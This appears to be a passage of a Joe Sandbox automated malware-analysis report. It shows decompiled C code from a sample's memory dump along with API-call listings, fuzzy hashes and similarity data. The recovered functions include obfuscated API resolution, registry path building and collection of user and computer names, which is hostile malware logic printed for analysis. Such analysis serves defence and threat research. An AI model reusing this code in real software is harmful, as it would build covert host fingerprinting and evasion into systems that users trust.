						_t42 = E0428976F(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E04288B22(_t36);
							_t36 = _t42;
						}
						_t43 = E0428A41C(_t36, _t33);
						if(_t43 != 0) {
							E04288B22(_t36);
							_t36 = _t43;
						}
					}
					E04288B22(_t28);
				}
				return _t36;
			}














                                0x04287b8d
                                0x04287b90
                                0x04287b91
                                0x04287b99
                                0x04287ba0
                                0x04287ba7
                                0x04287bab
                                0x04287bb1
                                0x04287bb8
                                0x04287bbd
                                0x04287bcf
                                0x04287bd3
                                0x04287bd7
                                0x04287bdd
                                0x04287be2
                                0x04287bf2
                                0x04287bf4
                                0x04287c0b
                                0x04287c0f
                                0x04287c12
                                0x04287c17
                                0x04287c17
                                0x04287c20
                                0x04287c24
                                0x04287c27
                                0x04287c2c
                                0x04287c2c
                                0x04287c24
                                0x04287c2f
                                0x04287c2f
                                0x04287c3a

                                APIs
                                  • Part of subcall function 0428A055: lstrlen.KERNEL32(00000000,00000000,00000000,7691C740,?,?,?,04287BA7,253D7325,00000000,00000000,7691C740,?,?,04289DA0,?), ref: 0428A0BC
                                  • Part of subcall function 0428A055: sprintf.NTDLL ref: 0428A0DD
                                • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,04289DA0,?,04D795B0), ref: 04287BB8
                                • lstrlen.KERNEL32(?,?,?,04289DA0,?,04D795B0), ref: 04287BC0
                                  • Part of subcall function 04281525: RtlAllocateHeap.NTDLL(00000000,00000000,04281278), ref: 04281531
                                • strcpy.NTDLL ref: 04287BD7
                                • lstrcat.KERNEL32(00000000,?), ref: 04287BE2
                                  • Part of subcall function 04281188: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,04287BF1,00000000,?,?,?,04289DA0,?,04D795B0), ref: 0428119F
                                  • Part of subcall function 04288B22: RtlFreeHeap.NTDLL(00000000,00000000,0428131A,00000000,?,?,00000000), ref: 04288B2E
                                • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04289DA0,?,04D795B0), ref: 04287BFF
                                  • Part of subcall function 0428976F: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04287C0B,00000000,?,?,04289DA0,?,04D795B0), ref: 04289779
                                  • Part of subcall function 0428976F: _snprintf.NTDLL ref: 042897D7
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                • String ID: =
                                • API String ID: 2864389247-1428090586
                                • Opcode ID: 985fffc7541cb3aa9b569fcd7020145b90742ad36c10c05a92dd4923789c7fcf
                                • Instruction ID: 57ac9a0dd37f0154d4c532acc275ecaf85b59b28e27bea089d5545decfe6c7cd
                                • Opcode Fuzzy Hash: 985fffc7541cb3aa9b569fcd7020145b90742ad36c10c05a92dd4923789c7fcf
                                • Instruction Fuzzy Hash: 0311C6737231257757127BB8AC48C6F76ADDED4A64315011DF504E7181DF38ED0247A1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0428944A, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON
                                Download Yara Rule
                                APIs
                                • SysAllocString.OLEAUT32(00000000), ref: 042894A4
                                • SysAllocString.OLEAUT32(0070006F), ref: 042894B8
                                • SysAllocString.OLEAUT32(00000000), ref: 042894CA
                                • SysFreeString.OLEAUT32(00000000), ref: 04289532
                                • SysFreeString.OLEAUT32(00000000), ref: 04289541
                                • SysFreeString.OLEAUT32(00000000), ref: 0428954C
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: String$AllocFree
                                • String ID:
                                • API String ID: 344208780-0
                                • Opcode ID: 6677d0134b5a590140c33625df41204688e0faba0ff4831a2d728edd06f78440
                                • Instruction ID: 464fb0e99c63ae54db476a58832ec1b478cee3f3502b54f0f8ffce2bfb7f7bd8
                                • Opcode Fuzzy Hash: 6677d0134b5a590140c33625df41204688e0faba0ff4831a2d728edd06f78440
                                • Instruction Fuzzy Hash: 7E41C131A11609AFDB01EFBCD8046AFBBB9EF48340F144029E900EB250DB75ED45CB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04284944, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E04284944(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E04281525(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x428d2a8; // 0xaea5a8
					_t1 = _t23 + 0x428e11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x428d2a8; // 0xaea5a8
					_t2 = _t26 + 0x428e769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E04288B22(_t54);
					} else {
						_t30 =  *0x428d2a8; // 0xaea5a8
						_t5 = _t30 + 0x428e756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x428d2a8; // 0xaea5a8
							_t7 = _t33 + 0x428e40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x428d2a8; // 0xaea5a8
								_t9 = _t36 + 0x428e4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x428d2a8; // 0xaea5a8
									_t11 = _t39 + 0x428e779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E04285CD1(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                                0x04284953
                                0x04284957
                                0x04284a19
                                0x0428495d
                                0x0428495d
                                0x04284962
                                0x04284975
                                0x04284977
                                0x0428497c
                                0x04284984
                                0x0428498b
                                0x0428498d
                                0x04284992
                                0x04284a11
                                0x04284a12
                                0x04284994
                                0x04284994
                                0x04284999
                                0x042849a1
                                0x042849a3
                                0x042849a8
                                0x00000000
                                0x042849aa
                                0x042849aa
                                0x042849af
                                0x042849b7
                                0x042849b9
                                0x042849be
                                0x00000000
                                0x042849c0
                                0x042849c0
                                0x042849c5
                                0x042849cd
                                0x042849cf
                                0x042849d4
                                0x00000000
                                0x042849d6
                                0x042849d6
                                0x042849db
                                0x042849e3
                                0x042849e5
                                0x042849ea
                                0x00000000
                                0x042849ec
                                0x042849f2
                                0x042849f7
                                0x042849fe
                                0x04284a03
                                0x04284a08
                                0x00000000
                                0x04284a0a
                                0x04284a0d
                                0x04284a0d
                                0x04284a08
                                0x042849ea
                                0x042849d4
                                0x042849be
                                0x042849a8
                                0x04284992
                                0x04284a27

                                APIs
                                  • Part of subcall function 04281525: RtlAllocateHeap.NTDLL(00000000,00000000,04281278), ref: 04281531
                                • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,042834A1,?,00000001,?,?,00000000,00000000), ref: 04284969
                                • GetProcAddress.KERNEL32(00000000,7243775A), ref: 0428498B
                                • GetProcAddress.KERNEL32(00000000,614D775A), ref: 042849A1
                                • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 042849B7
                                • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 042849CD
                                • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 042849E3
                                  • Part of subcall function 04285CD1: memset.NTDLL ref: 04285D50
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: AddressProc$AllocateHandleHeapModulememset
                                • String ID:
                                • API String ID: 1886625739-0
                                • Opcode ID: 48e936e3aa4d5109794d106c94c8f4a95796cf7bef17d06762e31061b836e76d
                                • Instruction ID: 4e7476fca952dc8e1767defc9cbb2046276f71642a86593ea35d628c7c024cbd
                                • Opcode Fuzzy Hash: 48e936e3aa4d5109794d106c94c8f4a95796cf7bef17d06762e31061b836e76d
                                • Instruction Fuzzy Hash: E2211CB172260BAFE710FF69E854D5EB7ECEB04754701402DE905DB2A1EB74E9088B64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04284B2A, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 88%
                                			E04284B2A(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x428d33c);
					_t91 = 0x80000002;
					L6:
					_t59 = E04287B3B( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E04288C52(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E04288B22(_a8);
						goto L29;
					}
					_t64 =  *0x428d278; // 0x4d79d18
					_t16 = _t64 + 0xc; // 0x4d79e3a
					_t65 = E04287B3B(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d0428c0
						if(E0428A38F(_t97,  *_t33, _t91, _a8,  *0x428d334,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x428d2a8; // 0xaea5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x428ea3f; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x428e8e7; // 0x55434b48
								_t69 = _t34;
							}
							if(E04288F85(_t69,  *0x428d334,  *0x428d338,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x428d2a8; // 0xaea5a8
									_t44 = _t71 + 0x428e846; // 0x74666f53
									_t73 = E04287B3B(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d0428c0
										E04284538( *_t47, _t91, _a8,  *0x428d338, _a24);
										_t49 = _t101 + 0x10; // 0x3d0428c0
										E04284538( *_t49, _t91, _t99,  *0x428d330, _a16);
										E04288B22(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d0428c0
									E04284538( *_t40, _t91, _a8,  *0x428d338, _a24);
									_t43 = _t101 + 0x10; // 0x3d0428c0
									E04284538( *_t43, _t91, _a8,  *0x428d330, _a16);
								}
								if( *_t101 != 0) {
									E04288B22(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d0428c0
					_t81 = E04287DDD( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d0428c0
							E0428A38F(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E04288B22(_t100);
						_t98 = _a16;
					}
					E04288B22(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E0428A789(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x428d33c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}























                                0x04284b2a
                                0x04284b33
                                0x04284b3a
                                0x04284b3f
                                0x04284bac
                                0x04284bb2
                                0x04284bb7
                                0x04284bbe
                                0x04284bc3
                                0x04284bc8
                                0x04284d33
                                0x04284d3a
                                0x04284d3a
                                0x04284d3f
                                0x04284d41
                                0x04284d41
                                0x04284d4a
                                0x04284d4a
                                0x04284bce
                                0x04284bda
                                0x04284d29
                                0x04284d2c
                                0x00000000
                                0x04284d2c
                                0x04284be0
                                0x04284be5
                                0x04284be8
                                0x04284bed
                                0x04284bf2
                                0x04284c3b
                                0x04284c3b
                                0x04284c4e
                                0x04284c58
                                0x04284c5e
                                0x04284c65
                                0x04284c6f
                                0x04284c6f
                                0x04284c67
                                0x04284c67
                                0x04284c67
                                0x04284c67
                                0x04284c91
                                0x04284c99
                                0x04284cc7
                                0x04284ccc
                                0x04284cd3
                                0x04284cd8
                                0x04284cdc
                                0x04284d0e
                                0x04284cde
                                0x04284ceb
                                0x04284cee
                                0x04284cfe
                                0x04284d01
                                0x04284d07
                                0x04284d07
                                0x04284c9b
                                0x04284ca8
                                0x04284cab
                                0x04284cbd
                                0x04284cc0
                                0x04284cc0
                                0x04284d18
                                0x04284d24
                                0x04284d1a
                                0x04284d1d
                                0x04284d1d
                                0x04284d18
                                0x04284c91
                                0x00000000
                                0x04284c58
                                0x04284c01
                                0x04284c04
                                0x04284c0b
                                0x04284c11
                                0x04284c14
                                0x04284c16
                                0x04284c22
                                0x04284c25
                                0x04284c25
                                0x04284c2b
                                0x04284c30
                                0x04284c30
                                0x04284c36
                                0x00000000
                                0x04284c36
                                0x04284b44
                                0x00000000
                                0x04284b6b
                                0x04284b6b
                                0x04284b77
                                0x04284b8a
                                0x04284b90
                                0x04284b98
                                0x00000000
                                0x04284b98

                                APIs
                                • StrChrA.SHLWAPI(04289900,0000005F,00000000,00000000,00000104), ref: 04284B5D
                                • lstrcpy.KERNEL32(?,?), ref: 04284B8A
                                  • Part of subcall function 04287B3B: lstrlen.KERNEL32(?,00000000,04D79D18,00000000,04285142,04D79F3B,?,?,?,?,?,69B25F44,00000005,0428D00C), ref: 04287B42
                                  • Part of subcall function 04287B3B: mbstowcs.NTDLL ref: 04287B6B
                                  • Part of subcall function 04287B3B: memset.NTDLL ref: 04287B7D
                                  • Part of subcall function 04284538: lstrlenW.KERNEL32(?,?,?,04284CF3,3D0428C0,80000002,04289900,04285C8D,74666F53,4D4C4B48,04285C8D,?,3D0428C0,80000002,04289900,?), ref: 0428455D
                                  • Part of subcall function 04288B22: RtlFreeHeap.NTDLL(00000000,00000000,0428131A,00000000,?,?,00000000), ref: 04288B2E
                                • lstrcpy.KERNEL32(?,00000000), ref: 04284BAC
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                • String ID: ($\
                                • API String ID: 3924217599-1512714803
                                • Opcode ID: 750dd791ab3454cc6408e0b96529b41ef616099c49b713dfc462014f88be6712
                                • Instruction ID: 33e7c396f8487ea1e6891663da349f847e91e0bb4894249eb35f5ad6ec410951
                                • Opcode Fuzzy Hash: 750dd791ab3454cc6408e0b96529b41ef616099c49b713dfc462014f88be6712
                                • Instruction Fuzzy Hash: 40515A7132220ABFEF11BFA4EC44EAE7BB9EF44308F14851DF911961A0E739E9159B10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04289FF6, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28sleepmemoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 37%
                                			E04289FF6() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x428d32c; // 0x4d795b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x428d32c; // 0x4d795b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x428d32c; // 0x4d795b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x428e81a) {
					HeapFree( *0x428d238, 0, _t10);
					_t7 =  *0x428d32c; // 0x4d795b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                                0x04289ff6
                                0x04289fff
                                0x0428a00f
                                0x0428a00f
                                0x0428a014
                                0x0428a019
                                0x00000000
                                0x00000000
                                0x0428a009
                                0x0428a009
                                0x0428a01b
                                0x0428a020
                                0x0428a024
                                0x0428a037
                                0x0428a03d
                                0x0428a03d
                                0x0428a046
                                0x0428a048
                                0x0428a04c
                                0x0428a052

                                APIs
                                • RtlEnterCriticalSection.NTDLL(04D79570), ref: 04289FFF
                                • Sleep.KERNEL32(0000000A,?,042830F3), ref: 0428A009
                                • HeapFree.KERNEL32(00000000,?,?,042830F3), ref: 0428A037
                                • RtlLeaveCriticalSection.NTDLL(04D79570), ref: 0428A04C
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                • String ID: Ut
                                • API String ID: 58946197-8415677
                                • Opcode ID: c0a1b597f138bec403d8383cbb2fd61147afb6804fc228852a7a538d5788162c
                                • Instruction ID: a5d088b7bfc8e2ce4881b9ae99d851ce9833788815aed1ad6fecbc6ba6fe66ea
                                • Opcode Fuzzy Hash: c0a1b597f138bec403d8383cbb2fd61147afb6804fc228852a7a538d5788162c
                                • Instruction Fuzzy Hash: 11F0B2747231419BE718AB69E84DB2DB7E4EB08345B04801EE902DB3A0CB3CEC04DE20
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04289267, Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E04289267() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E04281525(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E04288B22(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x4289cb2
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}















                                0x04289275
                                0x04289278
                                0x0428927b
                                0x04289281
                                0x04289286
                                0x0428928c
                                0x04289294
                                0x04289297
                                0x0428929d
                                0x042892a2
                                0x042892af
                                0x042892bc
                                0x042892c0
                                0x042892c2
                                0x042892c6
                                0x042892c9
                                0x042892d9
                                0x0428932c
                                0x0428932d
                                0x042892db
                                0x042892e0
                                0x042892e1
                                0x042892e6
                                0x042892e9
                                0x042892fc
                                0x00000000
                                0x042892fe
                                0x04289301
                                0x04289306
                                0x04289314
                                0x04289317
                                0x0428931d
                                0x04289322
                                0x00000000
                                0x04289324
                                0x04289324
                                0x04289327
                                0x04289327
                                0x04289322
                                0x042892fc
                                0x04289332
                                0x04289333
                                0x042892a2
                                0x04289339

                                APIs
                                • GetUserNameW.ADVAPI32(00000000,04289CB0), ref: 0428927B
                                • GetComputerNameW.KERNEL32(00000000,04289CB0), ref: 04289297
                                  • Part of subcall function 04281525: RtlAllocateHeap.NTDLL(00000000,00000000,04281278), ref: 04281531
                                • GetUserNameW.ADVAPI32(00000000,04289CB0), ref: 042892D1
                                • GetComputerNameW.KERNEL32(04289CB0,?), ref: 042892F4
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,04289CB0,00000000,04289CB2,00000000,00000000,?,?,04289CB0), ref: 04289317
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                • String ID:
                                • API String ID: 3850880919-0
                                • Opcode ID: 74ebbfd9547da37913ca3b24d3379eb10aa3b00b027afcab505438bca9129657
                                • Instruction ID: b0e67de207529e272c389130dc5083a4b0f52749c5cefaba7631ccbb79219afb
                                • Opcode Fuzzy Hash: 74ebbfd9547da37913ca3b24d3379eb10aa3b00b027afcab505438bca9129657
                                • Instruction Fuzzy Hash: 47212BB2A11109FFDB10DFE9E9888EEBBB8EF44304B5044AEE501E7280D734AB45DB10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04289EBB, Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E04289EBB(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x428d26c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x428d25c = _t4;
					_t6 = GetCurrentProcessId();
					 *0x428d258 = _t6;
					 *0x428d264 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x428d254 = _t7;
					if(_t7 == 0) {
						 *0x428d254 =  *0x428d254 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}









                                0x04289ec3
                                0x04289ec9
                                0x04289ed0
                                0x00000000
                                0x04289f2a
                                0x04289ed2
                                0x04289eda
                                0x04289ee7
                                0x04289ee7
                                0x04289f27
                                0x00000000
                                0x04289f27
                                0x04289ee9
                                0x04289ee9
                                0x04289eee
                                0x04289f00
                                0x04289f05
                                0x04289f0b
                                0x04289f11
                                0x04289f18
                                0x04289f1a
                                0x04289f1a
                                0x00000000
                                0x04289f21
                                0x04289ee3
                                0x00000000
                                0x00000000
                                0x04289ee5
                                0x00000000

                                APIs
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,042827C3,?,?,00000001,?,?,?,04287F25,?), ref: 04289EC3
                                • GetVersion.KERNEL32(?,00000001,?,?,?,04287F25,?), ref: 04289ED2
                                • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,04287F25,?), ref: 04289EEE
                                • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,04287F25,?), ref: 04289F0B
                                • GetLastError.KERNEL32(?,00000001,?,?,?,04287F25,?), ref: 04289F2A
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                • String ID:
                                • API String ID: 2270775618-0
                                • Opcode ID: 827501867525b23d131b20f72949731ce9db77723ca1df5d00f8b5fddc83465d
                                • Instruction ID: dc00b9ae77a103d1cd99b292a54bed1d05608f42771bde892e61cd0c07c0acf2
                                • Opcode Fuzzy Hash: 827501867525b23d131b20f72949731ce9db77723ca1df5d00f8b5fddc83465d
                                • Instruction Fuzzy Hash: A2F081B07733029BE714AFA9B81DB2D3B60E740741F10051EE542C61C6EBBCE885CB25
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04284E05, Relevance: 6.2, APIs: 4, Instructions: 154memorystringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 46%
                                			E04284E05(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x428d2a8; // 0xaea5a8
					_t5 = _t103 + 0x428e038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
